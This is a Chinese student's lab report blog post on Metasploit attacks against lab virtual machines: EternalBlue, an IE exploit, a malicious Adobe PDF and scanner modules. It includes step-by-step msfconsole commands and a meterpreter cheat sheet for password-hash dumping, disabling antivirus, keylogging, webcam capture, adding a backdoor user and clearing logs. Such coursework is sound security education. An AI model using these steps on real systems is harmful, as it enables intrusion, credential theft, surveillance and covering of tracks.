20212324 2023-2024-2 《网络与系统攻防技术》实验六实验报告

已于 2024-05-15 19:56:58 修改
阅读量1k 收藏 20
点赞数 15
文章标签: 网络 安全 web安全
于 2024-05-15 19:51:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/foruxx/article/details/138921153
版权

文章目录

1.实验内容

1.1实验内容

  • 1.1一个主动攻击实践,尽量使用最新的类似漏洞:ms17_010永恒之蓝
  • 1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞:ms10_002
  • 1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞:adobe阅读器漏洞adobe_cooltype sing
  • 1.4 成功应用任何一个辅助模块:使用主机发现模块auxiliary/scanner/portscan/tcp进行扫描

2.实验过程

2.1一个主动攻击实践,尽量使用最新的类似漏洞:永恒之蓝

2.1.1 扫描
  • 攻击机:kali(172.20.10.4),靶机:WinServer2008 R2(172.20.10.5)
  • 根据前面实验,想到用nessus作探测工具进行主动攻击的信息搜集。
  • 建立一个名字为20212324Jinbo的扫描项目,设置好基本漏洞扫描模式和靶机(windowss2008)的ip地址,点击小箭头开始扫描,查看扫描结果。
  • 结果如下,看得出来可以利用的漏洞比较多,而且漏洞描述比较详细。我点开一个比较典型的漏洞准备主动攻击。

image-20240513091228240

  • 再通过nmap扫描一下,准备试试ms10_010这个漏洞(上网一查竟然就是大名鼎鼎的永恒之蓝!):
nmap -p -sV --version-all --script vuln 172.20.10.5

image-20240513091336723

2.1.2 准备靶机
  • 打开靶机,注意先进行安全配置,最基本的是关闭防火墙等

image-20240513085642170

2.1.3 攻击
  • 接下来正式开始通过kali攻击。
  • 输入命令:
search ms17-010

image-20240513091756123

  • 根据系统选择4-win server 2008 r2
use 4

image-20240513091826018

  • 根据模块需要的参数进行相关配置
show missing
set rhosts 172.20.10.5

在这里插入图片描述

  • exploit执行,发现攻击直接成功了,连参考的链接当中的下一步都不需要!

image-20240515182455795

2.1.4漏洞利用和后渗透

运行getuid,pwd,sysinfo,hashdump等测试shell的可用性,并尝试留下后门等后渗透工作

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
clearev                       #清除日志

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞:ms10_002

2.2.1查找漏洞的模块并配置

  • 本实验我们使用ms10_002进行攻击

  • 攻击机:kali(172.20.10.4),靶机:WindowsXP(172.20.10.6)

  • 先查看nmap中存放漏洞的文件夹

image-20240515183256978

  • 可以看到,文件数量为105:

image-20240515183324069

  • 查找漏洞模块,找到对应模块后配置之

image-20240515183458287

image-20240515183513667

2.2.2修改靶机安全设置

  • 此处我们需要修改两处设置,一是关闭防火墙, 二是配置浏览器安全设置

    • 关闭防火墙image-20240515183911581
    • 修改ie安全中“标记为可安全执行脚本的ActiveX控件执行脚本”“允许运行或安装软件,即使签名无效”

    image-20240515184200551

    image-20240515184228584

2.2.3攻击
  • kali中在msfconsole当中exploit后,靶机链接控制台给出的网址,查看效果

image-20240515184621400

  • kali中回显发送数据包(建立会话)相关的信息,其中sessions可以看目前连接的会话,通过sessions -i x(x为对应标号)手动打开会话,即可成功进入靶机shell

image-20240515184615490

2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞:adobe阅读器漏洞adobe_cooltype sing

  • 本次攻击使用的是针对adobe的攻击adobe_cooltype sing,该漏洞的工作原理为:Adobe Reader在处理CoolType字体文件对应的sing表时,存在栈溢出漏洞,从而能够实现代码的远程执行
2.3.1配置模块
  • 进入对应漏洞,并按照show missing, show options提示来配置参数

image-20240515185709452

  • 可以看到,生成pdf的如下:

image-20240515185730181

2.3.2开启监听
  • 接着kali通过multi/handler开启监听,等待靶机自己送上门来

image-20240515185851819

2.3.3攻击
  • 靶机打开pdf,攻击机即可获取到靶机的shell

image-20240515185946035

image-20240515190014277

2.4 成功应用任何一个辅助模块:端口扫描辅助模块ipidseq;以及

2.4.1使用ipidseq模块
  • 本次我选择的辅助模块是ipidseq端口扫描模块,有点和nmap类似

image-20240515190745239

image-20240515190751287

  • 配置如下,线程为我的学号24,超时3秒视为timeout

image-20240515190822687

  • 扫描结果如下

image-20240515190831416

2.4.2使用ms12_004漏洞实现调用计算器的攻击
  • 本次模块有点简单,也有点和nmap已有功能重复,故再利用一个漏洞玩点新的
  • 配置模块需要的参数

image-20240515191149579

  • exploit,看看靶机回连结果,成功!

image-20240515191238542

image-20240515191255414

3.问题及解决方案

  • 问题1:在进行浏览器攻击时,攻击机发送完数据包后靶机浏览器就死了,多次尝试一直不能成功

  • 问题1解决方案:参考IE浏览器报错的原因以及解决方法,估计是程序运行了非法操作,故不仅要修改安全中自定义级别的两项,而是要直接改成默认级别的“低”,从而解决了这个问题。故我猜测攻击中还有其他越权行为,让浏览器产生异常报错

  • 问题2:使用端口扫描模块时,爆出不能使用socket等的错误

image-20240515191503797

  • 问题2解决方案:socket等功能需要root权限才能调用,需要通过sudo msfconsole登录才能解决

4.学习感悟、思考等

通过本次实验,我深刻体会到实验中的每一个步骤都考验着漏洞及工具的使用者对网络安全漏洞的理解。

4.1. 实验内容的反思

4.1.1 主动攻击实践
  • 漏洞利用的敏感性:使用如“永恒之蓝”这样的漏洞进行攻击,我深深体会到漏洞的严重性。靶机什么都不知道的情况下,这种攻击如果发生在真实环境中,后果不堪设想。
  • 攻击的隐蔽性:在后渗透阶段,我学习了如何不留痕迹地进行操作,这让我能够从反向认识了攻击者可能采用的各种隐蔽手段。
4.1.2 浏览器攻击
  • 攻击的多样性:浏览器的安全漏洞更加严重,可以不分系统地被用于多台主机,浏览器安全任重道远。
4.1.3 客户端攻击
  • 软件更新的必要性:通过Adobe Reader的漏洞攻击,我认识到了及时更新软件,修补已知漏洞的重要性。
  • 攻击的隐蔽性和危害性:客户端攻击通常不易被察觉,一旦成功,攻击者可以获得极高的权限。

4.2. 实验过程的体会

  • 信息搜集的重要性:攻击之前肯定需要进行信息搜集,本实验中我使用Nessus进行漏洞扫描,能够事半功倍。

  • 攻击流程的复杂性:从查找漏洞模块到配置参数,再到实际的攻击执行,每一步都需要精确的操作和配置,否则没法成功。

  • 安全设置的影响:通过调整安全设置解决了浏览器攻击的问题,我认识到了适当降低安全设置可能带来的风险,但也理解了在实验环境中为了模拟攻击而必须做出的调整。

参考资料

20212324晋博
关注
20212422 2023-2024-2 《网络系统攻防技术实验六实验报告
weixin_62978988的博客
05-12 972
实验自由度很高,我对Metasploit的使用也熟练了不少,不管是如何确定需要的payload,还是补全各种options的参数,都更加得心应手。这是网络攻防的第六次实验了,总体上问题遇到的并不少,但是在经过了前五次实验的洗礼,不管是无数次重启虚拟机、重装虚拟机,还是查阅大量的不全并且可能会出问题的教程,我的心态已经变得无比平和。这里会生成一个.docx文件,看后缀非常熟悉,这就是word格式的文件,可以使用office打开。3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞
永恒之蓝攻防实验
2401_82463993的博客
03-11 498
这边显示我们可以指定一个ip去扫描,然后run执行。meterpreter已经利用漏洞进到了对方主机。show options 查看模块的可配置选项。给实验机创建一个niuma文件夹到桌面上。确保攻击机和实验机在一个网段。用kali扫下win7的ip。再次指定ip 选中这个模块,shell进入对方的命令行。use 3 选中该模块。
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3550
永恒之蓝
20212324 2023-2024-2 《网络系统攻防技术实验7实验报告
foruxx的博客
05-20 679
进入setoolkit,依次选择“1-Social-Engineering Attacks”→“2-Website Attack Vectors”→“3-Credential Harvester Attack Method”→“2-Site Cloner”,并输入kali的IP地址、要克隆的网站的网址(本次结果实践,我选择了学信网登录平台)。经过尝试,我发现按照之前经验使用iphone的热点连接两台虚拟机的话并不能正常完成任务,而如果使用校园网(本次使用的是图书馆的网络)则可以正常进行实验
20212324 2023-2024-2 《网络系统攻防技术实验实验报告
foruxx的博客
06-05 737
WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。用户可以提交一段数据库查询代码,根 据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即 SQL注入。在1.1的基础上,编写JavaScript验证用户名、密码的规则。
20212303 2023-2024-2 《网络系统攻防技术实验4实验报告
m0_62984455的博客
04-15 1036
二进制文件可能是恶意软件,具有隐藏功能和破坏性。命名不影响其数字指纹。
20212308 2023-2024-2 《网络系统攻防技术实验实验报告
Wxc20212308的博客
03-27 582
问题描述:起因是我的kali缺少xxd安装包,于是联网下载资源。但我的虚拟机一直报错无法下载,仔细查看报错提示,加以思考,发现了原因是虚拟机桥接网络配置不正确。kali linux配置桥接网络:https://www.cnblogs.com/qzample/p/12919760.html。DHCP协议解析:https://zhuanlan.zhihu.com/p/265293856。​ ②如果我们键入的命令正确,那么该命令为绿色,如果键入的命令不正确,那么该命令为红色。​ ①根据提示,补全命令——【→】
20212308 2023-2024-2 《网络系统攻防技术实验实验报告
Wxc20212308的博客
06-05 752
它提供了对文档的结构化的表述,并定义了一种方式——程序和脚本能够动态地访问和更新文档的内容、结构和样式。随着时间的推移,PHP 已经成为一种广泛使用的开源语言,并且拥有大量的库和框架,可以处理从简单的网站到复杂的企业级应用程序的各种任务。MariaDB是一个开源的关系型数据库管理系统,它是MySQL的一个分支,由MySQL的创始人之一Michael Widenius领导的团队开发和维护。编写一个带有表单的简单的html,模拟用户登录页面,表单中有三个输入框,一个是用户名、一个是口令、还有一个是提交按钮。
20212419 2023-2024-2 《网络系统攻防技术实验实验报告
weixin_62989793的博客
03-28 1105
UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista和Windows Server 2008中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。Meterpreter不仅可以获取目标主机的屏幕、摄像头、麦克风等设备,甚至还可以通过一些方式来迷惑用户获取系统的system权限,这也就是说,一旦安装的程序中存在后门,那么整个电脑的所有数据都有可能被泄露。
20212306 2023-2024-2 《网络系统攻防技术实验实验报告
m0_62796010的博客
04-23 1734
从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置。获取wechat某一好友的IP地址,并查询获取该好友所在的具体地理位置。使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。靶机IP地址是否活跃;靶机开放了哪些TCP和UDP端口;靶机安装了什么操作系统,版本是多少;靶机上安装了哪些服务。
20212422 2023-2024-2 《网络系统攻防技术实验实验报告
weixin_62978988的博客
04-22 864
轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS 未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。本次实验网络功放的第五次实验,相比较前几次的实验,这次实验没有很多复杂烧脑的操作,除了Nessus的下载稍微麻烦一点,其他的操作都比较按部就班,不过简单操作的背后,是用实操带领我熟悉信息搜集技术的相关知识,我是比较喜欢本次实验的节奏与感觉的。因此,该产品很可能存在安全漏洞
20212422 2023-2024-2 《网络系统攻防技术实验实验报告
weixin_62978988的博客
05-15 722
但是可能是因为有一些信息安全保障技术课设的基础,所以我对SQL注入和XSS攻击的方式相对而言比较熟悉,但是对PHP语言进行网页编程的方式就很陌生,所以也是查阅了一些资料,借助了一些AI的力量,并顺利完成了实验。因为我靶场使用的不是webgoat而是pikachu,而pikachu的通关需要用到Burp抓包分析,所以在安装burp这一不上我耗费了不少时间,然后安装好之后,在如何使用Burp抓包问题上又花了很长时间,因为这个抓包软件的使用方式和WireShark的不太一样。
20202414 2022-2023-2 《网络系统攻防技术实验六实验报告
h118189的博客
05-16 1194
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
20202414 2022-2023-2 《网络系统攻防技术实验实验报告
h118189的博客
04-16 502
先查看hash值并查看文件类型信息,kali中有实现该功能的指令可以看到生成了对应的哈希值。本次实验流程较长,也使用了很多各种各样的工具,有些是老师给的,但是我感觉有些如IDA的版本太老了,并不是很好用,于是又去网上找了一个,所以实验的一部分时间都花在下软件卸软件上了。本次实验一开始还是感觉挺不好下手的,尤其是查看字符串的时候,总是一堆完全看不懂的东西,但是参考了学长学姐的资料后,慢慢也按照他们的流程走,也就知道了应该如何操作那些工具以及如何进行对恶意代码进行分析,应该说也算是受益匪浅。
IP数据包
最新发布
permit7的博客
10-11 1003
ARP协议是地址解析协议(Address Resolution Protocol)是通过解析IP地址得到MAC地址的,是一个在网络协议包中极其重要的网络传输协议,它与网卡有着极其密切的关系,在TCP/IP分层结构中,把ARP划分为网络层。
2024网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 2044
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全学习路线图(2024版详解)
baimaozi008的博客
10-10 979
近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以的完成上岸,还能够系统化学习,提升自己的后期竞争力。
WireShark过滤器
ngczx的博客
10-11 663
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Netty 相比原生IO模型的优势
lssffy的博客
10-09 657
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值